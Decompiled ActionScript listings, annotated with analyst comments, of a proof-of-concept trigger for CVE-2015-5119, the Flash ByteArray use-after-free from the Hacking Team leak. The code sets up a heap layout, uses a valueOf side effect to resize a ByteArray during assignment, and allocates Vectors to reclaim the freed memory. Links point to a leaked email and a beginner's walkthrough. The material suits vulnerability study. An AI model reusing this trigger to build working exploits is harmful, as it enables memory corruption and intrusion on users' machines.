package {
import flash.system.*;
import flash.filters.*;
import __AS3__.vec.*;
import flash.utils.*;
// Condensed sketch of the allocation pattern and ByteArray element assignment
// analysed on this page for CVE-2015-5119. It builds an array of ByteArrays
// interleaved with plain Objects, then assigns an object to one byte slot.
// NOTE(review): this reads like a simplified/decompiled listing rather than
// compilable source: `m` is never declared here, and the constructor is typed
// :void yet returns a value.
public class Main extends Sprite {
// Static reference to the ByteArray selected for the element assignment below.
static var ba:ByteArray;
public function Main():void{
var a:* = undefined;
var o:* = null;
var i:* = 0;
var j:* = 0;
// 98 slots: 20 leading ByteArrays, then 13 groups of 6 (slots 20..97).
a = new Array(98);
// `o` is allocated but never used again in this listing.
o = new Object();
// Slots 0..19: ByteArrays, each resized to 210 bytes.
while (i < 20){
a[i] = new ByteArray();
a[i].length = 210;
i += 1;
};
i = 20;
// Each pass fills six slots: Object at i, ByteArrays (210 bytes) at i+1..i+4,
// Object at i+5.
while (i < 98){
a[i] = new Object();
j = (i + 1);
while (j < (i + 5)) {
a[j] = new ByteArray();
a[j].length = 210;
j = (j + 1);
};
a[(i + 5)] = new Object();
i = (i + 6);
}
// 98-26 = 72, which is the last ByteArray of the group that starts at slot 68.
i = 98-26;
// The body returns unconditionally, so this loop runs at most once.
while (i > 20) {
ba = a[i];
try {
// Storing an object into a byte slot makes the runtime convert it to a number,
// which is where a user-defined valueOf gets called.
// NOTE(review): `m` is undeclared in this excerpt; errors are swallowed by
// the empty catch.
ba[1] = m;
} catch(e:Error) {};
// Reads the byte back so the caller can see what was actually stored.
return (ba[1]);
};
}
// valueOf attached to the class prototype; in this condensed listing it only
// returns 2 and has no side effects.
prototype.valueOf = function (){
return 2;
};
}
}
package {
import flash.system.*;
import flash.filters.*;
import __AS3__.vec.*;
import flash.utils.*;
// Test case for CVE-2015-5119 (ByteArray use-after-free, per the write-ups
// linked at the end of this page). TryExpl() assigns a MyCrash instance to a
// ByteArray element; the prototype valueOf defined at the bottom of the class
// resizes that same ByteArray while the assignment is still in progress.
// Defensive takeaway: implicit conversions (valueOf) can re-enter script, so a
// runtime must not keep using a buffer pointer or length it read before the
// conversion.
public class MyCrash {
// Holds references to the arrays allocated here (`a` and `_va` are pushed).
// Presumably this keeps them reachable so they are not collected. Confirm.
static var _gc:Array;
// Array of Vector.<uint> objects created inside valueOf.
static var _va:Array;
// Shared size: byte length of each ByteArray and element count of each Vector.
static var _vLen:uint = 210;
// The ByteArray whose element is assigned in TryExpl and resized in valueOf.
static var _cf:ByteArray;
// Read from Capabilities.isDebugger; not used anywhere in the visible code.
static var _isDbg:Boolean = Capabilities.isDebugger;
// Builds the array layout, performs the element assignment once, and returns
// the byte read back from _cf[1]. Returns 3 if an Error reaches the outer catch.
static function TryExpl():uint{
var j:* = 0;
var alen:* = 0;
var a:* = undefined;
var m:* = null;
var i:* = 0;
// `v` and `m0` are declared but never used in this function.
var v:* = null;
var m0:* = undefined;
try {
// 98 slots: 20 leading ByteArrays plus 13 groups of 6.
alen = (20 + 78);
a = new Array(alen);
if (_gc == null){
_gc = new Array();
};
_gc.push(a);
// Instance whose numeric conversion goes through the prototype valueOf below.
m = new (MyCrash);
// Slots 0..19: ByteArrays of _vLen bytes.
while (i < 20) {
a[i] = new ByteArray();
a[i].length = _vLen;
i = (i + 1);
};
i = 20;
// Each pass fills six slots: MyClass2 at i, ByteArrays at i+1..i+4,
// MyClass2 at i+5.
while (i < alen) {
a[i] = new MyClass2(i);
j = (i + 1);
while (j < (i + 5)) {
a[j] = new ByteArray();
a[j].length = _vLen;
j = (j + 1);
};
a[(i + 5)] = new MyClass2((i + 5));
i = (i + 6);
};
// alen - 26 = 72: the last ByteArray of the group that starts at slot 68.
i = (alen - 26);
// The body returns unconditionally, so this loop runs at most once.
while (i > 20) {
_cf = a[i];
trace("before");
try {
// Element store with an object on the right-hand side: the runtime converts
// `m` to a number, calling valueOf, which changes _cf.length before the store
// completes.
_cf[1] = m;
} catch(e:Error) {
trace("assignment error");
};
trace("after");
// NOTE(review): valueOf writes 99 to _cf[1] and then returns 2. If the store
// above lands in the current buffer, this should read 2; a 99 would suggest
// the store went to the old buffer. Inferred, not shown on the page.
return (_cf[1]);
};
} catch(e:Error) {
// Errors from the setup are swallowed; the function falls through to return 3.
};
return (3);
}
// valueOf with side effects: runs during the `_cf[1] = m` conversion above.
prototype.valueOf = function (){
var i:int;
trace("valueOf");
_va = new Array(5);
_gc.push(_va);
// Resizes the ByteArray from _vLen (210) to 2000 bytes mid-assignment. Per
// the linked write-ups this is the step that invalidates the buffer the
// pending store was about to use.
_cf.length = 2000;
// Allocates five Vector.<uint> objects of _vLen elements each.
// Presumably meant to occupy the memory released by the resize. Confirm.
while (i < _va.length) {
_va[i] = new Vector.<uint>();
_va[i].length = _vLen;
i++;
};
// Marker byte written into the resized ByteArray before returning.
_cf[1] = 99;
// Value that the interrupted assignment will store at index 1.
return (2);
};
}
}//package
package {
import flash.events.*;
import flash.text.*;
import flash.display.*;
// Document class for the test case: runs MyCrash.TryExpl() once at start-up
// and shows the returned byte in a text field, next to a red square and a button.
// Note that this page also contains an earlier, condensed class named Main.
public class Main extends Sprite {
public function Main():void{
var v:* = 0;
var clickHandler:* = null;
super();
trace("start");
// The click handler body is empty in this listing, so the click itself runs
// no script logic.
clickHandler = function (event:MouseEvent):void{
};
// Runs the test before any UI objects are created; `v` is the byte read back
// from _cf[1], or 3 if an error was caught.
v = MyCrash.TryExpl();
// Text field at (100, 0), 100x100, displaying the result.
var tf:* = new TextField();
tf.x = 100;
tf.y = 0;
tf.width = 100;
tf.height = 100;
addChild(tf);
tf.type = TextFieldType.INPUT;
tf.text = new String(("cf[1] value:\n" + v));
// Red 100x100 square drawn at the origin.
graphics.clear();
graphics.beginFill(0xFF0000);
graphics.drawRect(0, 0, 100, 100);
graphics.endFill();
// One sprite holding the label is reused for all four button states.
var content:* = new Sprite();
var btText:* = new TextField();
btText.text = "Push me to crash";
content.addChild(btText);
var bt:* = new SimpleButton();
addChild(bt);
bt.upState = content;
bt.overState = content;
bt.downState = content;
bt.hitTestState = content;
// NOTE(review): the label promises a crash but the handler is empty, so any
// crash on click would come from the runtime touching state left behind by
// TryExpl(). Inferred, not shown here.
bt.addEventListener(MouseEvent.CLICK, clickHandler);
trace("finish");
}
}
}//package
package {
// Plain object that MyCrash.TryExpl() places at both ends of each six-slot
// group (slots i and i + 5), with ByteArrays in between.
public class MyClass2 {
// Slot index passed in by the creator.
var i:int;
// Untyped member; never assigned in the visible code.
var length:*;
// Stores the given index on the new instance.
public function MyClass2(param1:int){
super();
i = param1;
}
}
}//package
https://wikileaks.org/hackingteam/emails/emailid/513536
https://labs.portcullis.co.uk/blog/cve-2015-5119-flash-bytearray-uaf-a-beginners-walkthrough/